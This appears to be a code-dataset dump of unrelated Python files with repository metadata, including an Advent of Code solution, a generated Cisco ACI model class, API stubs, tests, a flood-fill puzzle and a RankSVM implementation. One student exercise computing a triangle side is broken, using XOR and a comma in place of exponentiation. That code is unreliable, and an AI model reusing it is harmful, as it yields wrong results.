self.widget.setMaximumTime(time)
def set_time(self, time):
""" Set the widget's current time.
Parameters
----------
time : time
The time object to use for setting the date.
"""
self._guard |= CHANGED_GUARD
try:
self.widget.setTime(time)
finally:
self._guard &= ~CHANGED_GUARD
def set_time_format(self, format):
""" Set the widget's time format.
Parameters
----------
format : str
A Python time formatting string.
"""
# XXX make sure Python's and Qt's format strings are the
# same, or convert between the two.
self.widget.setDisplayFormat(format)
| [
"sccolbert@gmail.com"
] | sccolbert@gmail.com |
b6e09b6f677b13f8d2e6d045a590591ef79b6925 | 744594f30c5e283f6252909fc68102dd7bc61091 | /2017/1/1b_solution.py | 8d5ba5bf554a303bca904549ec99af4e75da9fed | [
"MIT"
] | permissive | vScourge/Advent_of_Code | 84f40c76e5dc13977876eea6dbea7d05637de686 | 36e4f428129502ddc93c3f8ba7950aed0a7314bb | refs/heads/master | 2022-12-20T22:12:28.646102 | 2022-12-15T22:16:28 | 2022-12-15T22:16:28 | 160,765,438 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,361 | py | """
Answer = 1284
"""
data_str = '77736991856689225253142335214746294932318813454849177823468674346512426482777696993348135287531487622845155339235443718798255411492778415157351753377959586612882455464736285648473397681163729345143319577258292849619491486748832944425643737899293811819448271546283914592546989275992844383947572926628695617661344293284789225493932487897149244685921644561896799491668147588536732985476538413354195246785378443492137893161362862587297219368699689318441563683292683855151652394244688119527728613756153348584975372656877565662527436152551476175644428333449297581939357656843784849965764796365272113837436618857363585783813291999774718355479485961244782148994281845717611589612672436243788252212252489833952785291284935439662751339273847424621193587955284885915987692812313251556836958571335334281322495251889724281863765636441971178795365413267178792118544937392522893132283573129821178591214594778712292228515169348771198167462495988252456944269678515277886142827218825358561772588377998394984947946121983115158951297156321289231481348126998584455974277123213413359859659339792627742476688827577318285573236187838749444212666293172899385531383551142896847178342163129883523694183388123567744916752899386265368245342587281521723872555392212596227684414269667696229995976182762587281829533181925696289733325513618571116199419759821597197636415243789757789129824537812428338192536462468554399548893532588928486825398895911533744671691387494516395641555683144968644717265849634943691721391779987198764147667349266877149238695714118982841721323853294642175381514347345237721288281254828745122878268792661867994785585131534136646954347165597315643658739688567246339618795777125767432162928257331951255792438831957359141651634491912746875748363394329848227391812251812842263277229514125426682179711184717737714178235995431465217547759282779499842892993556918977773236196185348965713241211365895519697294982523166196268941976859987925578945185217127344619169353395993198368185217391883839449331638641744279836858188235296951745922667612379649453277174224722894599153367373494255388826855322712652812127873536473277'
data = [ int( x ) for x in data_str ]
total = 0
for i in range( len( data ) ):
j = i + len( data ) // 2
if j > len( data ) - 1:
j = j - len( data )
if data[ i ] == data[ j ]:
total += data[ i ]
print( total )
| [
"adam.pletcher@gmail.com"
] | adam.pletcher@gmail.com |
8bf73471333f3eb235cbd5e9d88bd4651ab99a8b | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_256/ch13_2020_03_29_03_11_24_129259.py | c5dcd02a5b7f4db136ed8fd45890155019458445 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 67 | py | def encontra_cateto(hip, c1):
c2=(hip^2-c1^2)^0,5
return c2 | [
"you@example.com"
] | you@example.com |
9c55db4b00565f4ffe3a2d50ced5d3e2220ced2e | 32cb0be487895629ad1184ea25e0076a43abba0a | /LifePictorial/top/api/rest/PictureUpdateRequest.py | b32556481ce925c61750073a18148e80e3b936fa | [] | no_license | poorevil/LifePictorial | 6814e447ec93ee6c4d5b0f1737335601899a6a56 | b3cac4aa7bb5166608f4c56e5564b33249f5abef | refs/heads/master | 2021-01-25T08:48:21.918663 | 2014-03-19T08:55:47 | 2014-03-19T08:55:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | '''
Created by auto_sdk on 2014-02-10 16:59:30
'''
from top.api.base import RestApi
class PictureUpdateRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.new_name = None
self.picture_id = None
def getapiname(self):
return 'taobao.picture.update'
| [
"poorevil@gmail.com"
] | poorevil@gmail.com |
ad86893227e8f1041ddb9867ea4cfab250892595 | f4b60f5e49baf60976987946c20a8ebca4880602 | /lib64/python2.7/site-packages/acimodel-1.3_2j-py2.7.egg/cobra/modelimpl/hvs/fwsvctask.py | 4f250857ab9257f44fe27e88483f3a978c5fe7c5 | [] | no_license | cqbomb/qytang_aci | 12e508d54d9f774b537c33563762e694783d6ba8 | a7fab9d6cda7fadcc995672e55c0ef7e7187696e | refs/heads/master | 2022-12-21T13:30:05.240231 | 2018-12-04T01:46:53 | 2018-12-04T01:46:53 | 159,911,666 | 0 | 0 | null | 2022-12-07T23:53:02 | 2018-12-01T05:17:50 | Python | UTF-8 | Python | false | false | 17,029 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2016 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class FwSvcTask(Mo):
"""
Mo doc not defined in techpub!!!
"""
meta = ClassMeta("cobra.model.hvs.FwSvcTask")
meta.moClassName = "hvsFwSvcTask"
meta.rnFormat = "hvsFwSvcTask-%(id)s"
meta.category = MoCategory.TASK
meta.label = "None"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = False
meta.parentClasses.add("cobra.model.action.TopomgrSubj")
meta.parentClasses.add("cobra.model.action.ObserverSubj")
meta.parentClasses.add("cobra.model.action.VmmmgrSubj")
meta.parentClasses.add("cobra.model.action.SnmpdSubj")
meta.parentClasses.add("cobra.model.action.ScripthandlerSubj")
meta.parentClasses.add("cobra.model.action.ConfelemSubj")
meta.parentClasses.add("cobra.model.action.EventmgrSubj")
meta.parentClasses.add("cobra.model.action.OspaelemSubj")
meta.parentClasses.add("cobra.model.action.VtapSubj")
meta.parentClasses.add("cobra.model.action.OshSubj")
meta.parentClasses.add("cobra.model.action.DhcpdSubj")
meta.parentClasses.add("cobra.model.action.ObserverelemSubj")
meta.parentClasses.add("cobra.model.action.DbgrelemSubj")
meta.parentClasses.add("cobra.model.action.VleafelemSubj")
meta.parentClasses.add("cobra.model.action.NxosmockSubj")
meta.parentClasses.add("cobra.model.action.DbgrSubj")
meta.parentClasses.add("cobra.model.action.AppliancedirectorSubj")
meta.parentClasses.add("cobra.model.action.OpflexpSubj")
meta.parentClasses.add("cobra.model.action.BootmgrSubj")
meta.parentClasses.add("cobra.model.action.AeSubj")
meta.parentClasses.add("cobra.model.action.PolicymgrSubj")
meta.parentClasses.add("cobra.model.action.ExtXMLApiSubj")
meta.parentClasses.add("cobra.model.action.OpflexelemSubj")
meta.parentClasses.add("cobra.model.action.PolicyelemSubj")
meta.parentClasses.add("cobra.model.action.IdmgrSubj")
meta.superClasses.add("cobra.model.action.RInst")
meta.superClasses.add("cobra.model.pol.ComplElem")
meta.superClasses.add("cobra.model.task.Inst")
meta.superClasses.add("cobra.model.action.Inst")
meta.rnPrefixes = [
('hvsFwSvcTask-', True),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "data", "data", 52, PropCategory.REGULAR)
prop.label = "Data"
prop.isImplicit = True
prop.isAdmin = True
prop.range = [(0, 512)]
meta.props.add("data", prop)
prop = PropMeta("str", "descr", "descr", 33, PropCategory.REGULAR)
prop.label = "Description"
prop.isImplicit = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "endTs", "endTs", 15575, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("endTs", prop)
prop = PropMeta("str", "fail", "fail", 46, PropCategory.REGULAR)
prop.label = "Fail"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("fail", prop)
prop = PropMeta("str", "id", "id", 23455, PropCategory.REGULAR)
prop.label = "ID"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
prop.defaultValue = 0
prop.defaultValueStr = "none"
prop._addConstant("AddorDelUsegFwSvc", "addordelusegfwsvc", 2084)
prop._addConstant("none", "none", 0)
meta.props.add("id", prop)
prop = PropMeta("str", "invErrCode", "invErrCode", 49, PropCategory.REGULAR)
prop.label = "Remote Error Code"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("ERR-FILTER-illegal-format", None, 1140)
prop._addConstant("ERR-FSM-no-such-state", None, 1160)
prop._addConstant("ERR-HTTP-set-error", None, 1551)
prop._addConstant("ERR-HTTPS-set-error", None, 1552)
prop._addConstant("ERR-MO-CONFIG-child-object-cant-be-configured", None, 1130)
prop._addConstant("ERR-MO-META-no-such-object-class", None, 1122)
prop._addConstant("ERR-MO-PROPERTY-no-such-property", None, 1121)
prop._addConstant("ERR-MO-PROPERTY-value-out-of-range", None, 1120)
prop._addConstant("ERR-MO-access-denied", None, 1170)
prop._addConstant("ERR-MO-deletion-rule-violation", None, 1107)
prop._addConstant("ERR-MO-duplicate-object", None, 1103)
prop._addConstant("ERR-MO-illegal-containment", None, 1106)
prop._addConstant("ERR-MO-illegal-creation", None, 1105)
prop._addConstant("ERR-MO-illegal-iterator-state", None, 1100)
prop._addConstant("ERR-MO-illegal-object-lifecycle-transition", None, 1101)
prop._addConstant("ERR-MO-naming-rule-violation", None, 1104)
prop._addConstant("ERR-MO-object-not-found", None, 1102)
prop._addConstant("ERR-MO-resource-allocation", None, 1150)
prop._addConstant("ERR-aaa-config-modify-error", None, 1520)
prop._addConstant("ERR-acct-realm-set-error", None, 1513)
prop._addConstant("ERR-add-ctrlr", None, 1574)
prop._addConstant("ERR-admin-passwd-set", None, 1522)
prop._addConstant("ERR-api", None, 1571)
prop._addConstant("ERR-auth-issue", None, 1548)
prop._addConstant("ERR-auth-realm-set-error", None, 1514)
prop._addConstant("ERR-authentication", None, 1534)
prop._addConstant("ERR-authorization-required", None, 1535)
prop._addConstant("ERR-connect", None, 1572)
prop._addConstant("ERR-create-domain", None, 1562)
prop._addConstant("ERR-create-keyring", None, 1560)
prop._addConstant("ERR-create-role", None, 1526)
prop._addConstant("ERR-create-user", None, 1524)
prop._addConstant("ERR-delete-domain", None, 1564)
prop._addConstant("ERR-delete-role", None, 1528)
prop._addConstant("ERR-delete-user", None, 1523)
prop._addConstant("ERR-domain-set-error", None, 1561)
prop._addConstant("ERR-http-initializing", None, 1549)
prop._addConstant("ERR-incompat-ctrlr-version", None, 1568)
prop._addConstant("ERR-internal-error", None, 1540)
prop._addConstant("ERR-invalid-args", None, 1569)
prop._addConstant("ERR-invalid-domain-name", None, 1582)
prop._addConstant("ERR-ldap-delete-error", None, 1510)
prop._addConstant("ERR-ldap-get-error", None, 1509)
prop._addConstant("ERR-ldap-group-modify-error", None, 1518)
prop._addConstant("ERR-ldap-group-set-error", None, 1502)
prop._addConstant("ERR-ldap-set-error", None, 1511)
prop._addConstant("ERR-missing-method", None, 1546)
prop._addConstant("ERR-modify-ctrlr-access", None, 1567)
prop._addConstant("ERR-modify-ctrlr-dvs-version", None, 1576)
prop._addConstant("ERR-modify-ctrlr-rootcont", None, 1575)
prop._addConstant("ERR-modify-ctrlr-scope", None, 1573)
prop._addConstant("ERR-modify-ctrlr-trig-inventory", None, 1577)
prop._addConstant("ERR-modify-domain", None, 1563)
prop._addConstant("ERR-modify-domain-encapmode", None, 1581)
prop._addConstant("ERR-modify-domain-enfpref", None, 1578)
prop._addConstant("ERR-modify-domain-mcastpool", None, 1579)
prop._addConstant("ERR-modify-domain-mode", None, 1580)
prop._addConstant("ERR-modify-role", None, 1527)
prop._addConstant("ERR-modify-user", None, 1525)
prop._addConstant("ERR-modify-user-domain", None, 1565)
prop._addConstant("ERR-modify-user-role", None, 1532)
prop._addConstant("ERR-no-buf", None, 1570)
prop._addConstant("ERR-passwd-set-failure", None, 1566)
prop._addConstant("ERR-provider-group-modify-error", None, 1519)
prop._addConstant("ERR-provider-group-set-error", None, 1512)
prop._addConstant("ERR-radius-global-set-error", None, 1505)
prop._addConstant("ERR-radius-group-set-error", None, 1501)
prop._addConstant("ERR-radius-set-error", None, 1504)
prop._addConstant("ERR-request-timeout", None, 1545)
prop._addConstant("ERR-role-set-error", None, 1515)
prop._addConstant("ERR-secondary-node", None, 1550)
prop._addConstant("ERR-service-not-ready", None, 1539)
prop._addConstant("ERR-set-password-strength-check", None, 1543)
prop._addConstant("ERR-store-pre-login-banner-msg", None, 1521)
prop._addConstant("ERR-tacacs-enable-error", None, 1508)
prop._addConstant("ERR-tacacs-global-set-error", None, 1507)
prop._addConstant("ERR-tacacs-group-set-error", None, 1503)
prop._addConstant("ERR-tacacs-set-error", None, 1506)
prop._addConstant("ERR-user-account-expired", None, 1536)
prop._addConstant("ERR-user-set-error", None, 1517)
prop._addConstant("ERR-xml-parse-error", None, 1547)
prop._addConstant("communication-error", "communication-error", 1)
prop._addConstant("none", "none", 0)
meta.props.add("invErrCode", prop)
prop = PropMeta("str", "invErrDescr", "invErrDescr", 50, PropCategory.REGULAR)
prop.label = "Remote Error Description"
prop.isImplicit = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("invErrDescr", prop)
prop = PropMeta("str", "invRslt", "invRslt", 48, PropCategory.REGULAR)
prop.label = "Remote Result"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "not-applicable"
prop._addConstant("capability-not-implemented-failure", "capability-not-implemented-failure", 16384)
prop._addConstant("capability-not-implemented-ignore", "capability-not-implemented-ignore", 8192)
prop._addConstant("capability-not-supported", "capability-not-supported", 32768)
prop._addConstant("capability-unavailable", "capability-unavailable", 65536)
prop._addConstant("end-point-failed", "end-point-failed", 32)
prop._addConstant("end-point-protocol-error", "end-point-protocol-error", 64)
prop._addConstant("end-point-unavailable", "end-point-unavailable", 16)
prop._addConstant("extend-timeout", "extend-timeout", 134217728)
prop._addConstant("failure", "failure", 1)
prop._addConstant("fru-identity-indeterminate", "fru-identity-indeterminate", 4194304)
prop._addConstant("fru-info-malformed", "fru-info-malformed", 8388608)
prop._addConstant("fru-not-ready", "fru-not-ready", 67108864)
prop._addConstant("fru-not-supported", "fru-not-supported", 536870912)
prop._addConstant("fru-state-indeterminate", "fru-state-indeterminate", 33554432)
prop._addConstant("fw-defect", "fw-defect", 256)
prop._addConstant("hw-defect", "hw-defect", 512)
prop._addConstant("illegal-fru", "illegal-fru", 16777216)
prop._addConstant("intermittent-error", "intermittent-error", 1073741824)
prop._addConstant("internal-error", "internal-error", 4)
prop._addConstant("not-applicable", "not-applicable", 0)
prop._addConstant("resource-capacity-exceeded", "resource-capacity-exceeded", 2048)
prop._addConstant("resource-dependency", "resource-dependency", 4096)
prop._addConstant("resource-unavailable", "resource-unavailable", 1024)
prop._addConstant("service-not-implemented-fail", "service-not-implemented-fail", 262144)
prop._addConstant("service-not-implemented-ignore", "service-not-implemented-ignore", 131072)
prop._addConstant("service-not-supported", "service-not-supported", 524288)
prop._addConstant("service-protocol-error", "service-protocol-error", 2097152)
prop._addConstant("service-unavailable", "service-unavailable", 1048576)
prop._addConstant("sw-defect", "sw-defect", 128)
prop._addConstant("task-reset", "task-reset", 268435456)
prop._addConstant("timeout", "timeout", 8)
prop._addConstant("unidentified-fail", "unidentified-fail", 2)
meta.props.add("invRslt", prop)
prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "local"
prop._addConstant("implicit", "implicit", 4)
prop._addConstant("local", "local", 0)
prop._addConstant("policy", "policy", 1)
prop._addConstant("replica", "replica", 2)
prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
meta.props.add("lcOwn", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "oDn", "oDn", 51, PropCategory.REGULAR)
prop.label = "Subject DN"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("oDn", prop)
prop = PropMeta("str", "operSt", "operSt", 15674, PropCategory.REGULAR)
prop.label = "Completion"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "scheduled"
prop._addConstant("cancelled", "cancelled", 3)
prop._addConstant("completed", "completed", 2)
prop._addConstant("crashsuspect", "crash-suspect", 7)
prop._addConstant("failed", "failed", 4)
prop._addConstant("indeterminate", "indeterminate", 5)
prop._addConstant("processing", "processing", 1)
prop._addConstant("ready", "ready", 8)
prop._addConstant("scheduled", "scheduled", 0)
prop._addConstant("suspended", "suspended", 6)
meta.props.add("operSt", prop)
prop = PropMeta("str", "originMinority", "originMinority", 54, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = False
prop.defaultValueStr = "no"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("originMinority", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "runId", "runId", 45, PropCategory.REGULAR)
prop.label = "ID"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("runId", prop)
prop = PropMeta("str", "startTs", "startTs", 36, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("startTs", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "try", "try", 15574, PropCategory.REGULAR)
prop.label = "Try"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("try", prop)
prop = PropMeta("str", "ts", "ts", 47, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("ts", prop)
meta.namingProps.append(getattr(meta.props, "id"))
def __init__(self, parentMoOrDn, id, markDirty=True, **creationProps):
namingVals = [id]
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"collinsctk@qytang.com"
] | collinsctk@qytang.com |
2157f5ad78c10962340a58bdd733a32257639f36 | 6e3d061f94468905841a918278a352d4e5df89a1 | /hashicorp_vault_client/test/test_body70.py | 4abc0cc541b05ec6a2c886617b334da9410acb06 | [
"Apache-2.0"
] | permissive | drewmullen/HAC | 179a4188e6e6ce3a36d480e45f238fd0901a710f | fb185804fd244366f8f8d01df22835b3d96e7512 | refs/heads/master | 2020-08-03T12:13:08.785915 | 2019-10-03T18:33:04 | 2019-10-03T18:33:04 | 211,749,364 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 868 | py | # coding: utf-8
"""
HashiCorp Vault API
HTTP API that gives you full access to Vault. All API routes are prefixed with `/v1/`. # noqa: E501
OpenAPI spec version: 1.2.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import hashicorp_vault_client
from models.body70 import Body70 # noqa: E501
from hashicorp_vault_client.rest import ApiException
class TestBody70(unittest.TestCase):
"""Body70 unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testBody70(self):
"""Test Body70"""
# FIXME: construct object with mandatory attributes with example values
# model = hashicorp_vault_client.models.body70.Body70() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"drew@nebulaworks.com"
] | drew@nebulaworks.com |
bc31123ae5db9b82f65e97d1036afeff59cb28f4 | 5af41b5507a535cc228673f05c5da215c93a76b5 | /practice/puzzles/medium/Flood fill Example.py | 79d3877a13788695f417bc1a52f1ef3d83e793f1 | [] | no_license | mithrantir/CodinGame | d308f50f3d74bb105e678d0b66e439c68b07f9a1 | 306ead31859b3b499019adadbdd41631781ad192 | refs/heads/master | 2022-07-14T20:41:05.380179 | 2020-05-17T21:15:15 | 2020-05-17T21:15:15 | 259,610,126 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,169 | py |
with open('000.txt') as f:
read_data = f.read().split('\n')
w = int(read_data[0])
h = int(read_data[1])
# w = int(input())
# h = int(input())
alderaan = []
for i in range(h):
# alderaan.append([c for c in input()])
alderaan.append([c for c in read_data[2+i]])
tower = {}
for i in range(h):
for j in range(w):
if alderaan[i][j] != '.' and alderaan[i][j] != '#':
tower[(i, j)] = [[i, j]]
expand = True
while expand:
exp_points = {}
for (tx, ty) in tower:
tow_exp = []
for i, j in tower[(tx, ty)]:
if i > 0 and alderaan[i - 1][j] == '.':
tow_exp.append([i - 1, j])
if (i - 1, j) in exp_points and exp_points[(i - 1, j)][1] != [tx, ty]:
exp_points[(i - 1, j)] = ['+', [-1, -1]]
else:
exp_points[(i - 1, j)] = [alderaan[tx][ty], [tx, ty]]
if i < h - 1 and alderaan[i + 1][j] == '.':
tow_exp.append([i + 1, j])
if (i + 1, j) in exp_points and exp_points[(i + 1, j)][1] != [tx, ty]:
exp_points[(i + 1, j)] = ['+', [-1, -1]]
else:
exp_points[(i + 1, j)] = [alderaan[tx][ty], [tx, ty]]
if j > 0 and alderaan[i][j - 1] == '.':
tow_exp.append([i, j - 1])
if (i, j - 1) in exp_points and exp_points[(i, j - 1)][1] != [tx, ty]:
exp_points[(i, j - 1)] = ['+', [-1, -1]]
else:
exp_points[(i, j - 1)] = [alderaan[tx][ty], [tx, ty]]
if j < w - 1 and alderaan[i][j + 1] == '.':
tow_exp.append([i, j + 1])
if (i, j + 1) in exp_points and exp_points[(i, j + 1)][1] != [tx, ty]:
exp_points[(i, j + 1)] = ['+', [-1, -1]]
else:
exp_points[(i, j + 1)] = [alderaan[tx][ty], [tx, ty]]
tower[(tx, ty)] = tow_exp
if len(exp_points) == 0:
expand = False
else:
for (i, j) in exp_points:
alderaan[i][j] = exp_points[(i, j)][0]
for i in range(h):
print("".join(c for c in alderaan[i]))
| [
"christophoros.mouratidis@gmail.com"
] | christophoros.mouratidis@gmail.com |
9a7925334b208a1c4ede6feb518cced7303356b4 | fb0018545b1f0646a59a51522fd32ccbaf4c0bb7 | /py/escher/tests/test_urls.py | 1fd5806a34e1380e1a858f5be0f0e0a1b333f9ad | [
"MIT"
] | permissive | DD-DeCaF/escher | 083341268dad2195b402ae80391eb93e54b88365 | cd2c81bc62199f9349a9f24dd7a0a148fa6adc46 | refs/heads/master | 2022-07-24T18:49:55.835648 | 2020-02-15T14:48:52 | 2020-02-15T14:51:22 | 84,944,610 | 1 | 0 | NOASSERTION | 2018-10-08T08:50:49 | 2017-03-14T12:06:53 | JavaScript | UTF-8 | Python | false | false | 887 | py | from escher.urls import (
get_url,
get_filepath,
root_directory,
)
from escher.version import (
__version__,
__schema_version__,
__map_model_version__,
)
from os.path import join, exists
from pytest import raises
def test_online():
url = get_url('escher')
assert url == 'https://unpkg.com/escher@%s/dist/escher.js' % __version__
def test_local():
assert exists(get_filepath('map_jsonschema'))
def test_index_url():
url = get_url('server_index')
assert url == ('https://escher.github.io/%s/%s/index.json' %
(__schema_version__, __map_model_version__))
def test_map_download_url():
url = get_url('map_download')
assert url == ('https://escher.github.io/%s/%s/maps/' %
(__schema_version__, __map_model_version__))
def test_bad_url():
with raises(Exception):
get_url('bad-name')
| [
"zaking17@gmail.com"
] | zaking17@gmail.com |
d2309b65fbdf81233c3fec89a1b2055bfd35d8cb | d8761daf7bf2b75b9925b12450da2a6ea3d31140 | /tlbo/utils/rank_svm.py | c29c536605ebe543d3a59c20d0899f65957ca633 | [] | no_license | pyz2020/efficient-tlbo-DL-Model-Reoptimizations | 5dcc2c522d9430b4fab534689fd338fbfc6a6945 | dd2ed9c91b970e0ab4c0ed82382567ec0df6c42b | refs/heads/master | 2023-01-06T18:33:33.726527 | 2020-11-04T08:09:13 | 2020-11-04T08:09:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,459 | py | import itertools
import numpy as np
from scipy import stats
from sklearn import svm, linear_model, model_selection
def transform_pairwise(X, y):
"""Transforms data into pairs with balanced labels for ranking
Transforms a n-class ranking problem into a two-class classification
problem. Subclasses implementing particular strategies for choosing
pairs should override this method.
In this method, all pairs are choosen, except for those that have the
same target value. The output is an array of balanced classes, i.e.
there are the same number of -1 as +1
Parameters
----------
X : array, shape (n_samples, n_features)
The data
y : array, shape (n_samples,) or (n_samples, 2)
Target labels. If it's a 2D array, the second column represents
the grouping of samples, i.e., samples with different groups will
not be considered.
Returns
-------
X_trans : array, shape (k, n_feaures)
Data as pairs
y_trans : array, shape (k,)
Output class labels, where classes have values {-1, +1}
"""
X_new = []
y_new = []
y = np.asarray(y)
if y.ndim == 1:
y = np.c_[y, np.ones(y.shape[0])]
comb = itertools.combinations(range(X.shape[0]), 2)
for k, (i, j) in enumerate(comb):
if y[i, 0] == y[j, 0] or y[i, 1] != y[j, 1]:
# skip if same target or different group
continue
X_new.append(X[i] - X[j])
y_new.append(np.sign(y[i, 0] - y[j, 0]))
# output balanced classes
if y_new[-1] != (-1) ** k:
y_new[-1] = - y_new[-1]
X_new[-1] = - X_new[-1]
return np.asarray(X_new), np.asarray(y_new).ravel()
class RankSVM(object):
"""Performs pairwise ranking with an underlying LinearSVC model
Input should be a n-class ranking problem, this object will convert it
into a two-class classification problem, a setting known as
`pairwise ranking`.
See object :ref:`svm.LinearSVC` for a full description of parameters.
"""
def __init__(self):
self.clf = svm.SVC(kernel='linear', C=.1)
self.coef = None
def fit(self, X, y):
"""
Fit a pairwise ranking model.
Parameters
----------
X : array, shape (n_samples, n_features)
y : array, shape (n_samples,) or (n_samples, 2)
Returns
-------
self
"""
X_trans, y_trans = transform_pairwise(X, y)
self.clf.fit(X_trans, y_trans)
self.coef = self.clf.coef_.ravel() / np.linalg.norm(self.clf.coef_)
def predict(self, X):
if self.coef is not None:
return np.dot(X, self.coef)
else:
raise ValueError("Must call fit() prior to predict()")
def score(self, X, y):
print(np.dot(X, self.coef).shape)
print(y.shape)
tau, _ = stats.kendalltau(np.dot(X, self.coef), y)
return tau
if __name__ == '__main__':
# as showcase, we will create some non-linear data
# and print the performance of ranking vs linear regression
np.random.seed(1)
n_samples, n_features = 300, 5
true_coef = np.random.randn(n_features)
X = np.random.randn(n_samples, n_features)
noise = np.random.randn(n_samples) / np.linalg.norm(true_coef)
y = np.dot(X, true_coef)
y = np.arctan(y) # add non-linearities
y += .1 * noise # add noise
Y = np.c_[y, np.mod(np.arange(n_samples), 5)] # add query fake id
kf = model_selection.KFold(n_splits=5, shuffle=True)
# cv = model_selection.KFold(n_samples, 5)
train, test = list(iter(kf))[-1]
# make a simple plot out of it
# import pylab as pl
# pl.scatter(np.dot(X, true_coef), y)
# pl.title('Data to be learned')
# pl.xlabel('<X, coef>')
# pl.ylabel('y')
# pl.show()
# print the performance of ranking
rank_svm = RankSVM()
rank_svm.fit(X[train], Y[train])
print('Performance of ranking ', rank_svm.score(X[test], Y[test][:, 0]))
# print(rank_svm.predict(X[test]))
# and that of linear regression
ridge = linear_model.RidgeCV(fit_intercept=True)
ridge.fit(X[train], y[train])
# X_test_trans, y_test_trans = transform_pairwise(X[test], y[test])
# score = np.mean(np.sign(np.dot(X_test_trans, ridge.coef_)) == y_test_trans)
score, _ = stats.kendalltau(np.dot(X[test], ridge.coef_), Y[test][:, 0])
print('Performance of linear regression ', score)
| [
"1225646303@qq.com"
] | 1225646303@qq.com |
82575ef7f307733145700be6a98b158fd12278da | d0d1e07c984651f96bd9386d546c85c0341e46b2 | /scripts/kivy_experiments/importing/wombat2.py | 17307767b7aa1edc3ac0fe22fb3bb81f93eacf4a | [
"MIT"
